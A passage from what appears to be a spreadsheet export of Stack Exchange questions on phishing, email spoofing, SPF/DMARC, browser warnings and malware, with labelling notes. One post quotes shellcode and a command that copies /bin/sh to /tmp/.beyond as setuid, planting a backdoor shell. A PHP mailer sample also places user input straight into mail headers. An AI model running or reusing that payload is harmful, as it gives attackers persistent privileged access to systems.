 But when I use other emails (like yahoo, outlook), then I got no emails in my &lt;code&gt;$contact_email&lt;/code&gt;. Please help me to solve this problem. &lt;/p&gt;
 &lt;p&gt;PHP Mailer code:&lt;/p&gt;
 &lt;pre class="lang-php prettyprint-override"&gt;&lt;code&gt;&amp;lt;?php 
 global $_REQUEST;
 $response = array('error'=&amp;gt;'');
  $user_name = substr($_REQUEST['user_name'], 0, 20);
  $user_email = substr($_REQUEST['user_email'], 0, 40);
  $user_msg = $_REQUEST['user_msg'];
  $contact_email = 'contact.arefin@gmail.com'; 
  if (trim($contact_email)!='') {
  $subj = 'Message from Official Website';
  $msg = "Name: $user_name
  E-mail: $user_email
  Message: $user_msg";
  $head = "Content-Type: text/plain; charset=\"utf-8\"\n"
  . "X-Mailer: PHP/" . phpversion() . "\n"
  . "Reply-To: $user_email\n"
  . "To: $contact_email\n"
  . "From: $user_email\n";
  if (!@mail($contact_email, $subj, $msg, $head)) {
  $response['error'] = 'Error send message!';
  }
  } else 
  $response['error'] = 'Error send message!';
  echo json_encode($response);
  die();
 ?&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;email&gt;</t>
  </si>
  <si>
    <t>How does pushState protect against potential content forgeries?</t>
  </si>
  <si>
    <t>&lt;p&gt;As seen in &lt;a href="https://github.com/blog/760-the-tree-slider" rel="noreferrer"&gt;GitHub's blog&lt;/a&gt;, they've implemented &lt;a href="https://developer.mozilla.org/en/DOM/Manipulating_the_browser_history" rel="noreferrer"&gt;HTML5's JavaScript &lt;code&gt;pushState&lt;/code&gt;&lt;/a&gt; feature for tree browsing (for modern browsers), bringing AJAX navigation &lt;a href="http://danwebb.net/2011/5/28/it-is-about-the-hashbangs" rel="noreferrer"&gt;without Hash Bangs&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;The code is simple:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;$('#slider a').click(function() {
  history.pushState({ path: this.path }, '', this.href)
  $.get(this.href, function(data) {
  $('#slider').slideTo(data)
  })
  return false
 })
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;This quite elegantly allows them to:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Request the just the new content through AJAX instead of a full page&lt;/li&gt;
 &lt;li&gt;Animate the transition&lt;/li&gt;
 &lt;li&gt;&lt;strong&gt;And&lt;/strong&gt; change the browsers URL &lt;em&gt;(not just the &lt;code&gt;#&lt;/code&gt;, as Twitter does &amp;mdash; &lt;a href="http://twitter.com/stackexchange" rel="noreferrer"&gt;twitter.com/stackexchange&lt;/a&gt; &amp;rarr; &lt;a href="http://twitter.com/#!/stackexchange" rel="noreferrer"&gt;twitter.com/#!/stackexchange&lt;/a&gt; )&lt;/em&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;My question is, how does JavaScript prevent against the use of &lt;code&gt;pushState&lt;/code&gt; by one website to imitate another, resulting in a convincing &lt;a href="http://en.wikipedia.org/wiki/Phishing#Website_forgery" rel="noreferrer"&gt;phishing attack&lt;/a&gt;?&lt;/p&gt;
 &lt;p&gt;At the very least it seems that the domain can't be changed, but what about multiple paths within a site, potentially by multiple unrelated and untrusting content providers? Could one path (I.E. &lt;strong&gt;/joe&lt;/strong&gt;) essentially imitate another (pushState &lt;strong&gt;/jane&lt;/strong&gt;) and provide imitative content, with possibly malicious purposes?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;security&gt;&lt;html&gt;&lt;phishing&gt;&lt;pushstate&gt;</t>
  </si>
  <si>
    <t>Gophish API request is blocked : "header ‚Äòauthorization‚Äô is not allowed" (Javascript request)</t>
  </si>
  <si>
    <t>&lt;p&gt;I am using the Gophish API for the first time.&lt;/p&gt;
 &lt;p&gt;I can't get the list of the sending profiles through a simple Javascript HTTP request. Firefox display this error message :&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at
 ``https://MY_GOPHISH_SERVER_URL:3333/api/smtp``. (Reason: header ‚Äòauthorization‚Äô is not allowed according to header ‚ÄòAccess-Control-Allow-Headers‚Äô from CORS preflight response).
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Here is my request code :&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;fetch(&amp;quot;MY_GOPHISH_SERVER_URL:3333/api/smtp&amp;quot;, {
  method: &amp;quot;GET&amp;quot;,
  headers: {
  Authorization : MY_GOPHISH_API_KEY
  },
  })
  .then(response =&amp;gt; response.json())
  .then(data =&amp;gt; console.log(data))
  .catch(error =&amp;gt; console.error(error.message))
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;What could I try ? Is there a way to edit Gophish CORS policy ?&lt;/p&gt;
 &lt;p&gt;Thanks.&lt;/p&gt;
 &lt;p&gt;Julien&lt;/p&gt;
 &lt;p&gt;Additional information :&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;The campaigns made from Gophish browser interface work well.&lt;/li&gt;
 &lt;li&gt;If I try the same request with POSTMAN, it works only if I disable the SSL certificate verification.&lt;/li&gt;
 &lt;li&gt;The SSL certificate is valid (I own it and it is announced as valid by browsers)&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;api&gt;&lt;httprequest&gt;&lt;gophish&gt;</t>
  </si>
  <si>
    <t>Problem with iOS 12 with fullscreen mode on iPad - phishing detection false positive</t>
  </si>
  <si>
    <t>&lt;p&gt;In iOS 12 Apple appear to have implemented a security feature which detects rapid interaction with the iPad screen when in fullscreen mode and displays a warning message in the centre of the display which reads -&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;'It looks like you are typing while in full screen. Typing is not allowed in full-screen websites. "your-website" may be showing a fake keyboard to trick you into disclosing personal or financial information'
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The problem for us is that we are currently dragging a Google map and reacting to Google Map events, no keyboard events are fired, and as far as I can tell, nothing can be done to turn this off. Short of writing a letter to Apple explaining that I'm a developer and not a bad actor, I'm not sure how to counter this? Anyone any ideas? &lt;/p&gt;
 &lt;p&gt;Turning full screen mode off for Safari would probably solve it, but I'd just like to explore if anyone else has any potential solutions. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ios&gt;&lt;security&gt;&lt;safari&gt;&lt;fullscreen&gt;</t>
  </si>
  <si>
    <t>WebDriverError: Invalid Firefox preference value: network.http.phishy-userpass-length=255</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm trying to start a new test case via gecko driver (v0.15) with specific Firefox profile in Protractor 5.1.1. Following description was used to create the profile: &lt;a href="https://stackoverflow.com/questions/42151372/error-typeerror-profile-gettemplatedir-is-not-a-function-when-set-firefox-prof"&gt;Set firefox profile protractor&lt;/a&gt; &lt;/p&gt;
 &lt;p&gt;When I start the execution via protractor configuration, I get following error:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;WebDriverError: Invalid Firefox preference value: network.http.phishy-userpass-length=255&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;The same behavior for the preference &lt;code&gt;browser.download.folderList&lt;/code&gt; reference. &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;firefoxProfile.setPreference("browser.download.folderList", 2);
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Is there a workaround for this settings? I get a blocking popup, if the phishy-userpass-length is not set. &lt;/p&gt;
 &lt;p&gt;Thanks!&lt;/p&gt;
 &lt;p&gt;Regards,
 Waldemar&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;firefox&gt;&lt;selenium-webdriver&gt;&lt;protractor&gt;&lt;geckodriver&gt;</t>
  </si>
  <si>
    <t>error when running real time script with python</t>
  </si>
  <si>
    <t>&lt;p&gt;i have a file.log from syslog server and i want to parse the file based on columns and put into different file (parsing.log)
 when i run my script there is an error :&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Traceback (most recent call last):
  File "coding/parsing.py", line 17, in &amp;lt;module&amp;gt;
  for line in loglines:
  File "coding/parsing.py", line 7, in follow
  time.sleep(0.1)
 KeyboardInterrupt
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;below is my script :&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;import time
 def follow(thefile):
  thefile.seek(0,2)
  while True:
  line = thefile.readline()
  if not line:
  time.sleep(0.1)
  continue
  yield line
 if __name__ == '__main__':
  logfile = open("file.log","r")
  logout = open("/parsing.log","w")
  loglines = follow(logfile)
  category={'malware','phishing'}
  severity={'low','medium','critical'}
  for line in loglines:
  col = line.split(",")
  if len(col) &amp;gt;1 and col[33] in category or col[34] in severity:
  logout.write(col[1]+","+col[2]+","+col[3]+","+col[4]+"\n")
  else:
  pass
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;how to handle it?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Safari content blockers turn off</t>
  </si>
  <si>
    <t>&lt;p&gt;I have link and in Safari i show popup "Phishing warning "&lt;/p&gt;
 &lt;p&gt;How to turn content blocking on and off
 On your Mac, you can turn content blocking on and off in AdBlock's options, on the "GENERAL" tab.
 On your iPhone or iPad, it's in Settings &gt; Safari &gt; Content Blockers.
 &lt;a href="https://help.getadblock.com/support/solutions/articles/6000099239-what-is-safari-content-blocking-" rel="nofollow"&gt;https://help.getadblock.com/support/solutions/articles/6000099239-what-is-safari-content-blocking-&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://support.apple.com/en-us/HT201265" rel="nofollow"&gt;https://support.apple.com/en-us/HT201265&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;How Turn off Anti-phishing and Content Blockers with Javascript ?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;safari&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Why is it not possible for browsers to completely detect the Phishing pages?</t>
  </si>
  <si>
    <t>&lt;p&gt;The browsers have some capability to detect the phishing pages, but they are not able to detect all. Why is that?&lt;/p&gt;
 &lt;p&gt;Phishing still remains to be one of the most convenient way to hacking. Why is it not possible for browsers to detect all phishing pages, and not only the obvious ones.&lt;/p&gt;</t>
  </si>
  <si>
    <t>How to Deal with Bold Red 'Deceptive Site Ahead' Warning on Chrome?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have dev.randomlog.org which serves as a repository for many of my tests as a developer. It's up for over a decade (nearly two I think), but...&lt;/p&gt;
 &lt;p&gt;3 days ago, the notorious big red warning covers everything inside. Search console shows N/A in the sample URL, and &lt;code&gt;http://dev.randomlog[.]org/&lt;/code&gt; in &amp;quot;related messages&amp;quot;&lt;/p&gt;
 &lt;p&gt;This is quite frustrating since I had shared a few links from that domain with a prospective client.&lt;/p&gt;
 &lt;p&gt;I'm pretty certain there's no 'hack' going on as suggested by some links in the big red page. I am more inclined to believe that Google think I'm a phisher because there are forms on that domain that are now being used on other websites.&lt;/p&gt;
 &lt;p&gt;I Googled but have not yet found any solid information on how to resolve this issue.&lt;/p&gt;
 &lt;p&gt;I post here in hoping:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;Someone can provide another insight.&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;If my guess about phishing 'accusation' is correct, what should I do next? Putting ethics aside, is it dangerous (as we can be accused of phishing by THE GOOGLE) to leave some forms that are identical with other site's form in our site?&lt;/p&gt;
 &lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;--&lt;/p&gt;
 &lt;p&gt;Bonus problem: I tried posting the exact same text above in Google Search Console Community forum but it said: Failed to post. Content violates Community Policy.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;google-chrome&gt;&lt;malware&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>selenium - python - identify suspected phishing sites</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm trying running code (in Python) that can identify suspected phishing sites. I'm using Selenium's chromedriver. This is my code:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;import os, os.path, sys
 from selenium import webdriver
 from selenium.webdriver.chrome.options import Options
 chrome_options = Options()
 chrome_options.add_experimental_option( "prefs", {'safebrowsing.enabled':1})
 chromedriver = "my chromedriver path"
 os.environ["webdriver.chrome.driver"] = chromedriver
 driver = webdriver.Chrome(chromedriver, chrome_options=chrome_options)
 driver.get('site url I want to check')
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;My code checks 'V' on "enable phishing and malware protection" in the privacy settings, but for some reason while using Chrome (not the window one opened by Python) the site I check is suspected as phishing and the Chrome window opened by my Python code is not showing anything related to phishing.&lt;/p&gt;
 &lt;p&gt;Any ideas?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;selenium-chromedriver&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Randomise</t>
  </si>
  <si>
    <t>Isn't Google Safe Browsing enough</t>
  </si>
  <si>
    <t>What are the disadvantages of Google Safe Browsing?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm currently undertaking my thesis regarding phishing detection. I understand that Google Safe Browsing relies on a constantly updated blacklist in order to classify webpages. Their blacklist does not suffer from the drawback of being unable able to detect zero-hour phishing attacks. After all, &lt;a href="https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/35580.pdf" rel="noreferrer"&gt;the blacklist is generated by a machine learning algorithm, trained daily with tens of millions of data&lt;/a&gt; (assuming the "blacklist" they refer to in the paper is indeed the one used by Safe Browsing).&lt;/p&gt;
 &lt;p&gt;My question is, would there be any reason &lt;strong&gt;not&lt;/strong&gt; to rely on Safe Browsing? &lt;/p&gt;
 &lt;p&gt;Conversely, given the popularity of Chrome (and Firefox, which maintains their own blacklist; also queries Safe Browsing in case the URL doesn't contain an entry in their list), would there be any reason to opt using a browser extension instead? (like &lt;a href="https://crypto.stanford.edu/SpoofGuard/" rel="noreferrer"&gt;SpoofGuard&lt;/a&gt; and &lt;a href="http://www.netcraft.com/" rel="noreferrer"&gt;Netcraft&lt;/a&gt;)&lt;/p&gt;
 &lt;p&gt;Additionally, why would a company invest in phishing solutions (not enough rep points, see the solutions provided by: Entrust, PhishMe, LookingGlassCyber) when they can just use Safe Browsing?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;google&gt;&lt;chrome&gt;&lt;phishing&gt;&lt;safe-browsing-filter&gt;</t>
  </si>
  <si>
    <t>The tradeoff between freedom and technical defences</t>
  </si>
  <si>
    <t>How to protect a vulnerable Family Member?</t>
  </si>
  <si>
    <t>&lt;p&gt;I apologize if this isn't the best exchange to be asking in, but I'm a little new at this.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Problem:&lt;/strong&gt; A close relation outside my local area with declining cognitive function is demonstrating increasingly poor infosec practices. I have a plan to try preserver their online freedom while keeping them reasonably safe, but have no idea if it's any good.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Details:&lt;/strong&gt; Relation has issue with poor impulse control, and frankly a long unaddressed history of terrible infosec. They have multiple email accounts, some dating back decades, and little to no hesitation about opening extremely questionable attachments. I am aware of at least one successful remote access phishing attack. They are prone to visiting sites that pose security threats.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Devices:&lt;/strong&gt; The user works mostly on a windows machine,and has an iOS phone. The residence also has an OSx (x86) machine, other iOS devices, and a small number of networked devices. (printer/smart tv/etc.)&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;My Skill Level:&lt;/strong&gt; Technically competent w/ limited coding skills, but decent hardware skills. Little to no experience with network management or Linux. I &lt;em&gt;do&lt;/em&gt; have an embarrassing abundance of free time at the moment.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Current Plan:&lt;/strong&gt;&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Toss the users current system after an expert retrieves critical files from it&lt;/li&gt;
 &lt;li&gt;Hardware authenticator &amp;amp; password manager&lt;/li&gt;
 &lt;li&gt;Purchase a subscription-based anti-virus program&lt;/li&gt;
 &lt;li&gt;Implement DNS filtering via PiHole to block malicous IPs&lt;/li&gt;
 &lt;li&gt;Setup remote access behind a VPN. (Preferable with a simple hardware switch to start &amp;amp; stop the service that also shoots an sms to me)&lt;/li&gt;
 &lt;li&gt;Harden the Pi with something like Tripwire IDS &amp;amp; Rkhunter&lt;/li&gt;
 &lt;li&gt;Wipe/factory reset all networked devices to the best of my ability&lt;/li&gt;
 &lt;li&gt;Find/implement a method to segregate the users computer from other networked devices&lt;/li&gt;
 &lt;li&gt;Attempt* to migrate the user to a new set of email address, or at least retire the most dangerous ones&lt;/li&gt;
 &lt;li&gt;Attempt* to revoke the user's administrative access&lt;/li&gt;
 &lt;li&gt;Attempt* to migrate the user's from windows to OSx or even Chrome OS**&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;*I say attempt, not due to a lack of technical knowledge, but with regards to user buy-in.&lt;/p&gt;
 &lt;p&gt;**The user has previously resisted a proposed migration to a chromebook, on the basis they will lose access to excel.&lt;/p&gt;
 &lt;p&gt;I would greatly appreciate any and all feedback this community could offer. As a novice, I'm well aware I may be missing low hanging fruit or pursuing wildly impractical solutions.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;privacy&gt;&lt;phishing&gt;&lt;remote-desktop&gt;</t>
  </si>
  <si>
    <t>KHoloud's code</t>
  </si>
  <si>
    <t>Informing users about login attempts</t>
  </si>
  <si>
    <t>Password same-account indicators on websites</t>
  </si>
  <si>
    <t>&lt;p&gt;I am creating a user system which will be used across multiple websites without the use of SSO (the extra hassle really isn't worth it at the minute).&lt;/p&gt;
 &lt;p&gt;I am looking at ways of telling users that they can use their X Network username/password details on our specific websites.&lt;/p&gt;
 &lt;p&gt;However - one interesting point I've thought is that are these essentially a sign of a false sense of security?&lt;/p&gt;
 &lt;p&gt;For example - Say you are logging into to "Website A" and you see the "X Network" logo, so you know you can log in there.&lt;/p&gt;
 &lt;p&gt;Now for example, a Phisher sets up "Website P" and puts the "X Network" logo on it so people think it is a part of the X Network.&lt;/p&gt;
 &lt;p&gt;Are these more hassle than it's worth?&lt;/p&gt;
 &lt;p&gt;Is it just easier to let the user type their email in, and find out that way they have an account and then tell them where their account is probably from? Or even safer - logging where it was registered and telling them, or emailing them with the information on X failed login attempt(s).&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;databases&gt;&lt;phishing&gt;&lt;user-management&gt;</t>
  </si>
  <si>
    <t>Is it phishing? Human/Manual detection and reporting</t>
  </si>
  <si>
    <t>Exclude, Website vulnerability allows to enject harmful code</t>
  </si>
  <si>
    <t>What does this potentially malicious code do?</t>
  </si>
  <si>
    <t>&lt;p&gt;While reading a website called 4chan/b/ someone posted this code snippet, i was wondering what it does when executed? it appears to be C code, how harmful is it?&lt;/p&gt;
 &lt;p&gt;This is the full post:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Run a live system and try this:
 char esp[] __attribute__ ((section(‚Äú.text‚Äù))) /* e.s.p
  release */
 = ‚Äú\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68‚Ä≥
 ‚Äú\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99‚Ä≥
 ‚Äú\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7‚Ä≥
 ‚Äú\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56‚Ä≥
 ‚Äú\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31‚Ä≥
 ‚Äú\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69‚Ä≥
 ‚Äú\x6e\x2f\x73\x68\x00\x2d\x63\x00‚Ä≥
 ‚Äúcp -p /bin/sh /tmp/.beyond; chmod 4755
 /tmp/.beyond;‚Äù;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Would it be safe to test it in a sandbox?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Getting phishing emails after selling our trademarks</t>
  </si>
  <si>
    <t>How can I reclaim a company email account from former Canadian distributor?</t>
  </si>
  <si>
    <t>&lt;p&gt;A former company rep in Canada took our (COMPANY DBA)@GMAIL.COM address for use in representing our products in Canada. She has moved on and seems to have discarded the name as all that seem so come through to us is phishing and SPAM with that address now. &lt;/p&gt;
 &lt;p&gt;Some time ago, I asked kindly for her to surrender it but got no response. Is there a way that I can get this address back since it is clearly our trademark that has been in use in Canada for 32 years?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;google&gt;</t>
  </si>
  <si>
    <t>Pacerier</t>
  </si>
  <si>
    <t>Exclude - drive by download</t>
  </si>
  <si>
    <t>Can you get virus just by visiting a website in Chrome?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've recently read &lt;a href="https://web.archive.org/web/20090108080040/http://www.straightsectalk.com/?p=47" rel="noreferrer"&gt;Google Chrome: The End of Drive-By Downloads&lt;/a&gt;. Is it true to say that drive-by-downloads are history in Google Chrome?&lt;/p&gt;
 &lt;p&gt;So if I have a link (from a spam email) I can right-click &gt;&gt; &lt;code&gt;open in new incognito window&lt;/code&gt; &gt;&gt; and be 100% sure that there is no virus / damage to my system?&lt;/p&gt;
 &lt;p&gt;Initially i've asked this question at &lt;a href="https://webapps.stackexchange.com/questions/15209/anonymous-links-in-email/15211"&gt;https://webapps.stackexchange.com/questions/15209/anonymous-links-in-email/15211&lt;/a&gt; but I'm not getting a good answer (and besides the answers are all targeted at phishing-sites whereas my question is targeted at "virus-sites").&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;malware&gt;</t>
  </si>
  <si>
    <t>Cannot stop phishing emails</t>
  </si>
  <si>
    <t>SPF/DMARC for shared email provider (gmail) - how did this email pass SPF?</t>
  </si>
  <si>
    <t>&lt;p&gt;We recently received an email from a self described &amp;quot;white hat hacker&amp;quot; purporting to be from our own organization.&lt;/p&gt;
 &lt;p&gt;According to the mail headers, spf, dmarc, dkim and arc all passed okay and gmail didn't flag it in anyway.&lt;/p&gt;
 &lt;p&gt;We use google domains for our email and the spf/dmarc record in question for the domain is&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;SPF v=spf1 include:_spf.google.com -all&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;blockquote&gt;
 &lt;p&gt;DMARC _dmarc.companyX.com v=DMARC1; p=none; pct=100; rua=mailto:john.smith@companyX.com&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;(I realise the DMARC setting is quarantining none at the moment, but I don't believe this would have helped as all the checks passed)&lt;/p&gt;
 &lt;p&gt;The SPF pass (and there are two of them - one from our domain, and one from the original sender domain)&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Received-SPF: pass (google.com: domain of enquiries+xyz@companyX.com designates 209.85.220.69 as permitted sender) client-ip=209.85.220.69;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Received-SPF: pass (google.com: domain of MrWhiteHat@inbox.eu designates 195.216.236.82 as permitted sender) client-ip=195.216.236.82;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;From what I can understand, as we have specified _spf.google.com (and it's associated IP's) as a permitted sender, any email sent using those servers (ie, by any gmail user) is valid. My understanding is is obviously wrong, but I'm not sure why/how, or more importantly, what do I need to change in order to prevent this spoofing from passing.&lt;/p&gt;
 &lt;p&gt;I've found references to a vulnerability in gmail where the attacker uses inbound gateways to bypass the internal SPF check, but this was fixed back in August, and as far as I can see, the SPF check is actually being made (and passing) - &lt;a href="https://ezh.es/blog/2020/08/the-confused-mailman-sending-spf-and-dmarc-passing-mail-as-any-gmail-or-g-suite-customer/" rel="nofollow noreferrer"&gt;https://ezh.es/blog/2020/08/the-confused-mailman-sending-spf-and-dmarc-passing-mail-as-any-gmail-or-g-suite-customer/&lt;/a&gt; and &lt;a href="https://www.forbes.com/sites/leemathews/2020/08/20/google-fixed-a-dangerous-gmail-bug-that-allowed-email-spoofing/" rel="nofollow noreferrer"&gt;https://www.forbes.com/sites/leemathews/2020/08/20/google-fixed-a-dangerous-gmail-bug-that-allowed-email-spoofing/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;There is this similar question - &lt;a href="https://security.stackexchange.com/questions/209886/how-did-a-phishing-email-pass-spf-dkim-and-dmarc"&gt;How did a phishing email pass SPF, DKIM and DMARC?&lt;/a&gt; but I do not think that is relevant as the email in that question was actually from a different domain (From: uber, instead of From: Bank of America), where as the From: in this email was explicity CompanyX), and there is no resolution in that question about how to block senders like this.&lt;/p&gt;
 &lt;p&gt;Questions&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;What stops any gmail user from being able to impersonate any other company that authorizes _spf.google.com as a sender?&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;What can I change in my set up to prevent this from happening?&lt;/p&gt;
 &lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Thanks&lt;/p&gt;
 &lt;hr /&gt;
 &lt;p&gt;Semi complete headers - have stripped out some that I think are irrelevant for space reasons.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Delivered-To: john.smith@companyX.com
 Return-Path: &amp;lt;enquiries+xyz@companyX.com&amp;gt;
 Received: from mail-sor-f69.google.com (mail-sor-f69.google.com. [209.85.220.69])
  by mx.google.com with SMTPS id a77sor4025261wme.15.2020.12.10.15.34.18
  for &amp;lt;john.smith@companyX.com&amp;gt;
  (Google Transport Security);
  Thu, 10 Dec 2020 15:34:19 -0800 (PST)
 Received-SPF: pass (google.com: domain of enquiries+xyz@companyX.com designates 209.85.220.69 as permitted sender) client-ip=209.85.220.69;
 Authentication-Results: mx.google.com;
  dkim=pass header.i=@companyX-com.20150623.gappssmtp.com header.s=20150623 header.b=&amp;quot;xcnlWAQ/&amp;quot;;
  arc=pass (i=2 spf=pass spfdomain=inbox.eu dkim=pass dkdomain=inbox.eu dmarc=pass fromdomain=inbox.eu);
  spf=pass (google.com: domain of enquiries+xyz@companyX.com designates 209.85.220.69 as permitted sender) smtp.mailfrom=enquiries+xyz@companyX.com;
  dmarc=pass (p=NONE sp=NONE dis=NONE) header.from=companyX.com
 ARC-Authentication-Results: i=1; mx.google.com;
  dkim=pass header.i=@inbox.eu header.s=20140211 header.b=OQtRvw0v;
  spf=pass (google.com: domain of MrWhiteHat@inbox.eu designates 195.216.236.82 as permitted sender) smtp.mailfrom=MrWhitehattester@inbox.eu;
  dmarc=pass (p=QUARANTINE sp=NONE dis=NONE) header.from=inbox.eu
 Received: from eu-shark2.inbox.eu (eu-shark2.inbox.eu. [195.216.236.82])
  by mx.google.com with ESMTPS id v7si6670766wra.295.2020.12.10.15.34.17
  for &amp;lt;enquiries@companyX.com&amp;gt;
  (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
  Thu, 10 Dec 2020 15:34:17 -0800 (PST)
 Received-SPF: pass (google.com: domain of MrWhiteHat@inbox.eu designates 195.216.236.82 as permitted sender) client-ip=195.216.236.82;
 Received: from eu-shark2.inbox.eu (localhost [127.0.0.1])
  by eu-shark2-out.inbox.eu (Postfix) with ESMTP id B3004442C39
  for &amp;lt;enquiries@companyX.com&amp;gt;; Fri, 11 Dec 2020 01:34:16 +0200 (EET)
 Received: from localhost (localhost [127.0.0.1])
  by eu-shark2-in.inbox.eu (Postfix) with ESMTP id A70E64428EF
  for &amp;lt;enquiries@companyX.com&amp;gt;; Fri, 11 Dec 2020 01:34:16 +0200 (EET)
 Received: from eu-shark2.inbox.eu ([127.0.0.1])
  by localhost (eu-shark2.inbox.eu [127.0.0.1]) (spamfilter, port 35)
  with ESMTP id CNGUsZY_Hba1 for &amp;lt;enquiries@companyX.com&amp;gt;;
  Fri, 11 Dec 2020 01:34:16 +0200 (EET)
 Received: from mail.inbox.eu (eu-pop1 [127.0.0.1])
  by eu-shark2-in.inbox.eu (Postfix) with ESMTP id 08A1B440DC5
  for &amp;lt;enquiries@companyX.com&amp;gt;; Fri, 11 Dec 2020 01:34:16 +0200 (EET)
 Received: from DESKTOPR10AFHO (unknown [39.34.131.177])
  (Authenticated sender: MrWhiteHat@inbox.eu)
  by mail.inbox.eu (Postfix) with ESMTPA id 36E2F1BE00DA
  for &amp;lt;enquiries@companyX.com&amp;gt;; Fri, 11 Dec 2020 01:34:14 +0200 (EET)
 From: &amp;quot;'Mr White Hat' via Sales &amp;amp; Enquiries&amp;quot; &amp;lt;enquiries@companyX.com&amp;gt;
 To: &amp;lt;enquiries@companyX.com&amp;gt;
 X-Original-Sender: MrWhiteHat@inbox.eu
 X-Original-Authentication-Results: mx.google.com; dkim=pass
  header.i=@inbox.eu header.s=20140211 header.b=OQtRvw0v; spf=pass
  (google.com: domain of MrWhiteHat@inbox.eu designates 195.216.236.82
  as permitted sender) smtp.mailfrom=Whitehattester@inbox.eu;
  dmarc=pass (p=QUARANTINE sp=NONE dis=NONE) header.from=inbox.eu
 X-Original-From: &amp;quot;Mr White Hat&amp;quot; &amp;lt;Whitehattester@inbox.eu&amp;gt;
 Reply-To: &amp;quot;Mr White Hat&amp;quot; &amp;lt;Whitehattester@inbox.eu&amp;gt;```
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;spoofing&gt;&lt;spf&gt;&lt;dmarc&gt;</t>
  </si>
  <si>
    <t>Phishing emails from inside</t>
  </si>
  <si>
